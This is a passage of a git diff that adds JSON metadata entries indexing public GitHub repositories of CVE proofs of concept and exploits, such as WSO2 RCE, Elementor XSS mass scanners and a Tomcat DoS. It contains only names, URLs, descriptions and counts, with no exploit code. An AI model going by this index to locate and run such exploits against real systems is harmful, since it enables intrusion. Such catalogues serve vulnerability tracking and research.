"watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 671189433, + "name": "expluatation_CVE-2022-29078", + "full_name": "shurochka1396\/expluatation_CVE-2022-29078", + "owner": { + "login": "shurochka1396", + "id": 75414361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75414361?v=4", + "html_url": "https:\/\/github.com\/shurochka1396", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shurochka1396\/expluatation_CVE-2022-29078", + "description": null, + "fork": false, + "created_at": "2023-07-26T18:42:09Z", + "updated_at": "2023-07-26T18:42:16Z", + "pushed_at": "2023-07-26T18:42:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 883535763, + "name": "CVE-2022-29078", + "full_name": "l0n3m4n\/CVE-2022-29078", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2022-29078", + "description": "Serverside Template Injection (SSTI) RCE - THM challenge \"whiterose\" ", + "fork": false, + "created_at": "2024-11-05T06:15:45Z", + "updated_at": "2024-12-27T08:50:24Z", + "pushed_at": "2024-11-08T14:00:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ctf", + "exploit", + "ssti", + "tryhackme", + "web-pentesting" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 913540389, + "name": "CVE-2022-29078", + "full_name": "chuckdu21\/CVE-2022-29078", + "owner": { + "login": "chuckdu21", + "id": 40186049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40186049?v=4", + "html_url": "https:\/\/github.com\/chuckdu21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chuckdu21\/CVE-2022-29078", + "description": "PoC for CVE-2022-29078", + "fork": false, + "created_at": "2025-01-07T22:07:52Z", + "updated_at": "2025-01-07T22:27:45Z", + "pushed_at": "2025-01-07T22:27:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29154.json b/2022/CVE-2022-29154.json new file mode 100644 index 0000000000..b6c5af6aa0 --- /dev/null +++ b/2022/CVE-2022-29154.json @@ -0,0 +1,33 @@ +[ + { + "id": 536604298, + "name": "CVE-2022-29154", + "full_name": "EgeBalci\/CVE-2022-29154", + "owner": { + "login": "EgeBalci", + "id": 17179401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17179401?v=4", + "html_url": "https:\/\/github.com\/EgeBalci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EgeBalci\/CVE-2022-29154", + "description": "HIP2022 presentation materials.", + "fork": false, + "created_at": "2022-09-14T13:59:21Z", + "updated_at": "2024-09-24T16:59:18Z", + "pushed_at": "2022-09-14T14:19:43Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29170.json b/2022/CVE-2022-29170.json new file mode 100644 index 0000000000..3862cff212 --- /dev/null +++ b/2022/CVE-2022-29170.json @@ -0,0 +1,33 @@ +[ + { + "id": 594668634, + "name": "CVE-2022-29170", + "full_name": "yijikeji\/CVE-2022-29170", + "owner": { + "login": "yijikeji", + "id": 42433368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42433368?v=4", + "html_url": "https:\/\/github.com\/yijikeji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yijikeji\/CVE-2022-29170", + "description": "Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security feature allows list allows to configure Grafana in a way so that the instance doesn’t call or only calls specific hosts. The vulnerability present starting with version 7.4.0-beta1 and prior to versions 7.5. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-29T09:10:44Z", + "updated_at": "2023-02-20T13:57:30Z", + "pushed_at": "2022-12-29T07:40:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29361.json b/2022/CVE-2022-29361.json new file mode 100644 index 0000000000..501fd2240b --- /dev/null +++ b/2022/CVE-2022-29361.json @@ -0,0 +1,64 @@ +[ + { + "id": 625487881, + "name": "Werkzeug-CVE-2022-29361-PoC", + "full_name": "kevin-mizu\/Werkzeug-CVE-2022-29361-PoC", + "owner": { + "login": "kevin-mizu", + "id": 48991194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48991194?v=4", + "html_url": "https:\/\/github.com\/kevin-mizu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kevin-mizu\/Werkzeug-CVE-2022-29361-PoC", + "description": null, + "fork": false, + "created_at": "2023-04-09T09:07:26Z", + "updated_at": "2024-01-16T14:16:06Z", + "pushed_at": "2023-04-09T16:02:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723368358, + "name": "CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS", + "full_name": "l3ragio\/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS", + "owner": { + "login": "l3ragio", + "id": 48380612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48380612?v=4", + "html_url": "https:\/\/github.com\/l3ragio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l3ragio\/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS", + "description": null, + "fork": false, + "created_at": "2023-11-25T12:56:50Z", + "updated_at": "2024-06-02T13:50:24Z", + "pushed_at": "2023-11-25T13:14:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29380.json b/2022/CVE-2022-29380.json new file mode 100644 index 0000000000..85b20d8ddb --- /dev/null +++ b/2022/CVE-2022-29380.json @@ -0,0 +1,33 @@ +[ + { + "id": 880923099, + "name": "CVE-2022-29380", + "full_name": "OpenXP-Research\/CVE-2022-29380", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-29380", + "description": "2022-29380", + "fork": false, + "created_at": "2024-10-30T15:50:46Z", + "updated_at": "2024-10-30T15:51:46Z", + "pushed_at": "2024-10-30T15:51:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29455.json b/2022/CVE-2022-29455.json index 20034a48ab..e24a81c278 100644 --- a/2022/CVE-2022-29455.json +++ b/2022/CVE-2022-29455.json @@ -29,5 +29,160 @@ "watchers": 4, "score": 0, "subscribers_count": 1 + }, + { + "id": 532884056, + "name": "CVE-2022-29455", + "full_name": "akhilkoradiya\/CVE-2022-29455", + "owner": { + "login": "akhilkoradiya", + "id": 102510716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102510716?v=4", + "html_url": "https:\/\/github.com\/akhilkoradiya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akhilkoradiya\/CVE-2022-29455", + "description": "Wordpress Vulnerability - XSS ( Cross-Site Scripting )", + "fork": false, + "created_at": "2022-09-05T12:08:50Z", + "updated_at": "2024-11-29T14:18:35Z", + "pushed_at": "2022-09-05T12:21:59Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 585658055, + "name": "CVE-2022-29455", + "full_name": "yaudahbanh\/CVE-2022-29455", + "owner": { + "login": "yaudahbanh", + "id": 39010800, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39010800?v=4", + "html_url": "https:\/\/github.com\/yaudahbanh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaudahbanh\/CVE-2022-29455", + "description": "Mass Scanner for CVE-2022-29455 on Elementor Plugins Wordpress", + "fork": false, + "created_at": "2023-01-05T18:29:47Z", + "updated_at": "2023-03-22T08:09:03Z", + "pushed_at": "2023-01-05T18:30:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600651739, + "name": "CVE-2022-29455", + "full_name": "0xc4t\/CVE-2022-29455", + "owner": { + "login": "0xc4t", + "id": 105418279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105418279?v=4", + "html_url": "https:\/\/github.com\/0xc4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xc4t\/CVE-2022-29455", + "description": "CVE-2022-29455", + "fork": false, + "created_at": "2023-02-12T06:26:11Z", + "updated_at": "2023-02-27T14:55:17Z", + "pushed_at": "2023-02-24T13:43:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647997479, + "name": "CVE-2022-29455", + "full_name": "tucommenceapousser\/CVE-2022-29455", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2022-29455", + "description": null, + "fork": false, + "created_at": "2023-06-01T01:40:08Z", + "updated_at": "2023-06-01T01:42:09Z", + "pushed_at": "2023-06-01T01:46:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647998526, + "name": "CVE-2022-29455-mass", + "full_name": "tucommenceapousser\/CVE-2022-29455-mass", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2022-29455-mass", + "description": null, + "fork": false, + "created_at": "2023-06-01T01:44:45Z", + "updated_at": "2023-06-01T01:44:57Z", + "pushed_at": "2023-06-01T01:44:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-29464.json b/2022/CVE-2022-29464.json index 98a2f2129c..08b753f5fa 100644 --- a/2022/CVE-2022-29464.json +++ b/2022/CVE-2022-29464.json @@ -589,5 +589,353 @@ "watchers": 0, "score": 0, "subscribers_count": 0 + }, + { + "id": 510649929, + "name": "WSO2RCE", + "full_name": "Pasch0\/WSO2RCE", + "owner": { + "login": "Pasch0", + "id": 78447612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78447612?v=4", + "html_url": "https:\/\/github.com\/Pasch0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pasch0\/WSO2RCE", + "description": "CVE-2022-29464 Exploit", + "fork": false, + "created_at": "2022-07-05T08:27:04Z", + "updated_at": "2023-11-12T16:10:10Z", + "pushed_at": "2023-11-29T17:37:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520007959, + "name": "-CVE-2022-29464", + "full_name": "r4x0r1337\/-CVE-2022-29464", + "owner": { + "login": "r4x0r1337", + "id": 99073650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99073650?v=4", + "html_url": "https:\/\/github.com\/r4x0r1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4x0r1337\/-CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-08-01T07:27:29Z", + "updated_at": "2022-10-24T03:11:43Z", + "pushed_at": "2023-02-28T08:57:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 524474931, + "name": "CVE-2022-29464", + "full_name": "amit-pathak009\/CVE-2022-29464", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:14:43Z", + "updated_at": "2022-05-19T21:24:13Z", + "pushed_at": "2022-05-19T21:24:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 524475053, + "name": "CVE-2022-29464-mass", + "full_name": "amit-pathak009\/CVE-2022-29464-mass", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-29464-mass", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:15:18Z", + "updated_at": "2024-08-12T20:26:10Z", + "pushed_at": "2022-05-29T19:16:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 540011346, + "name": "CVE-2022-29464", + "full_name": "hupe1980\/CVE-2022-29464", + "owner": { + "login": "hupe1980", + "id": 24973437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hupe1980\/CVE-2022-29464", + "description": "WSO2 Arbitrary File Upload to Remote Command Execution (RCE)", + "fork": false, + "created_at": "2022-09-22T14:04:49Z", + "updated_at": "2025-01-01T03:12:52Z", + "pushed_at": "2022-09-25T07:58:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-29464", + "wso2" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 565982204, + "name": "CVE-2022-29464", + "full_name": "gbrsh\/CVE-2022-29464", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2022-29464", + "description": "RCE exploit for WSO2", + "fork": false, + "created_at": "2022-11-14T18:22:41Z", + "updated_at": "2024-01-04T23:27:19Z", + "pushed_at": "2022-11-14T18:24:56Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 579590994, + "name": "CVE-2022-29464", + "full_name": "devengpk\/CVE-2022-29464", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-12-18T07:44:43Z", + "updated_at": "2022-12-18T08:03:14Z", + "pushed_at": "2022-12-18T08:07:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 632383541, + "name": "CVE-2022-29464", + "full_name": "ThatNotEasy\/CVE-2022-29464", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2022-29464", + "description": "Perform With Mass Exploits In WSO Management.", + "fork": false, + "created_at": "2023-04-25T09:45:18Z", + "updated_at": "2024-08-12T20:31:02Z", + "pushed_at": "2023-07-24T22:21:30Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "administrator-privileges", + "auto-exploiter", + "wso2" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709455861, + "name": "CVE-2022-29464", + "full_name": "Pushkarup\/CVE-2022-29464", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2022-29464", + "description": "A PoC and Exploit for CVE 2022-29464", + "fork": false, + "created_at": "2023-10-24T18:54:09Z", + "updated_at": "2023-10-26T19:21:35Z", + "pushed_at": "2023-10-25T03:54:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719704174, + "name": "CVE-2022-29464", + "full_name": "SynixCyberCrimeMy\/CVE-2022-29464", + "owner": { + "login": "SynixCyberCrimeMy", + "id": 151055664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151055664?v=4", + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy\/CVE-2022-29464", + "description": "SynixCyberCrimeMY CVE Exploiter By SamuraiMelayu1337 & ?\/h4zzzzzz.scc", + "fork": false, + "created_at": "2023-11-16T18:16:29Z", + "updated_at": "2023-11-16T18:18:22Z", + "pushed_at": "2023-11-16T18:32:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812068172, + "name": "CVE-2022-29464", + "full_name": "cc3305\/CVE-2022-29464", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2022-29464", + "description": "CVE-2022-29464 exploit script", + "fork": false, + "created_at": "2024-06-07T22:17:05Z", + "updated_at": "2024-07-27T20:18:09Z", + "pushed_at": "2024-07-27T20:18:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-29469.json b/2022/CVE-2022-29469.json new file mode 100644 index 0000000000..e01239b405 --- /dev/null +++ b/2022/CVE-2022-29469.json @@ -0,0 +1,33 @@ +[ + { + "id": 719237611, + "name": "CVE-2022-29469", + "full_name": "S4muraiMelayu1337\/CVE-2022-29469", + "owner": { + "login": "S4muraiMelayu1337", + "id": 130330296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130330296?v=4", + "html_url": "https:\/\/github.com\/S4muraiMelayu1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4muraiMelayu1337\/CVE-2022-29469", + "description": null, + "fork": false, + "created_at": "2023-11-15T18:47:44Z", + "updated_at": "2023-11-15T18:49:58Z", + "pushed_at": "2023-11-15T18:51:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29581.json b/2022/CVE-2022-29581.json new file mode 100644 index 0000000000..42b1262eee --- /dev/null +++ b/2022/CVE-2022-29581.json @@ -0,0 +1,64 @@ +[ + { + "id": 581490021, + "name": "linux-4.19.72_CVE-2022-29581", + "full_name": "Nidhi77777\/linux-4.19.72_CVE-2022-29581", + "owner": { + "login": "Nidhi77777", + "id": 121148550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121148550?v=4", + "html_url": "https:\/\/github.com\/Nidhi77777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nidhi77777\/linux-4.19.72_CVE-2022-29581", + "description": null, + "fork": false, + "created_at": "2022-12-23T10:41:44Z", + "updated_at": "2023-03-10T01:13:38Z", + "pushed_at": "2024-10-14T03:00:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 581520392, + "name": "linux-4.19.72_CVE-2022-29581", + "full_name": "nidhihcl\/linux-4.19.72_CVE-2022-29581", + "owner": { + "login": "nidhihcl", + "id": 121002296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121002296?v=4", + "html_url": "https:\/\/github.com\/nidhihcl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl\/linux-4.19.72_CVE-2022-29581", + "description": null, + "fork": false, + "created_at": "2022-12-23T12:33:21Z", + "updated_at": "2023-03-10T01:15:25Z", + "pushed_at": "2024-10-14T05:16:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29582.json b/2022/CVE-2022-29582.json new file mode 100644 index 0000000000..cc26633434 --- /dev/null +++ b/2022/CVE-2022-29582.json @@ -0,0 +1,33 @@ +[ + { + "id": 521319413, + "name": "CVE-2022-29582-Exploit", + "full_name": "Ruia-ruia\/CVE-2022-29582-Exploit", + "owner": { + "login": "Ruia-ruia", + "id": 61450241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61450241?v=4", + "html_url": "https:\/\/github.com\/Ruia-ruia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ruia-ruia\/CVE-2022-29582-Exploit", + "description": "Exploit for CVE-2022-29582 targeting Google's Kernel CTF", + "fork": false, + "created_at": "2022-08-04T15:29:04Z", + "updated_at": "2024-12-25T09:00:31Z", + "pushed_at": "2022-08-08T04:13:33Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 72, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29856.json b/2022/CVE-2022-29856.json new file mode 100644 index 0000000000..bb1b1ebc4c --- /dev/null +++ b/2022/CVE-2022-29856.json @@ -0,0 +1,33 @@ +[ + { + "id": 536933243, + "name": "CVE-2022-29856-PoC", + "full_name": "Flo451\/CVE-2022-29856-PoC", + "owner": { + "login": "Flo451", + "id": 79860728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79860728?v=4", + "html_url": "https:\/\/github.com\/Flo451", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Flo451\/CVE-2022-29856-PoC", + "description": "Minimal PoC for CVE-2022-29856", + "fork": false, + "created_at": "2022-09-15T08:29:15Z", + "updated_at": "2022-09-15T08:33:56Z", + "pushed_at": "2022-09-15T08:32:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29885.json b/2022/CVE-2022-29885.json index 1700d7816f..44e8515bb8 100644 --- a/2022/CVE-2022-29885.json +++ b/2022/CVE-2022-29885.json @@ -29,5 +29,36 @@ "watchers": 5, "score": 0, "subscribers_count": 0 + }, + { + "id": 509388193, + "name": "CVE-2022-29885", + "full_name": "iveresk\/CVE-2022-29885", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/CVE-2022-29885", + "description": "Apache Tomcat DoS (CVE-2022-29885) Exploit", + "fork": false, + "created_at": "2022-07-01T09:02:10Z", + "updated_at": "2024-04-29T08:54:03Z", + "pushed_at": "2022-07-05T06:23:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-2992.json b/2022/CVE-2022-2992.json new file mode 100644 index 0000000000..10519744b5 --- /dev/null +++ b/2022/CVE-2022-2992.json @@ -0,0 +1,74 @@ +[ + { + "id": 547835773, + "name": "CVE-2022-2992", + "full_name": "CsEnox\/CVE-2022-2992", + "owner": { + "login": "CsEnox", + "id": 60170196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60170196?v=4", + "html_url": "https:\/\/github.com\/CsEnox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CsEnox\/CVE-2022-2992", + "description": "Authenticated Remote Command Execution in Gitlab via GitHub import", + "fork": false, + "created_at": "2022-10-08T11:42:49Z", + "updated_at": "2024-12-27T02:58:40Z", + "pushed_at": "2022-10-09T03:54:53Z", + "stargazers_count": 224, + "watchers_count": 224, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 224, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 551659117, + "name": "CVE-2022-2992", + "full_name": "Malwareman007\/CVE-2022-2992", + "owner": { + "login": 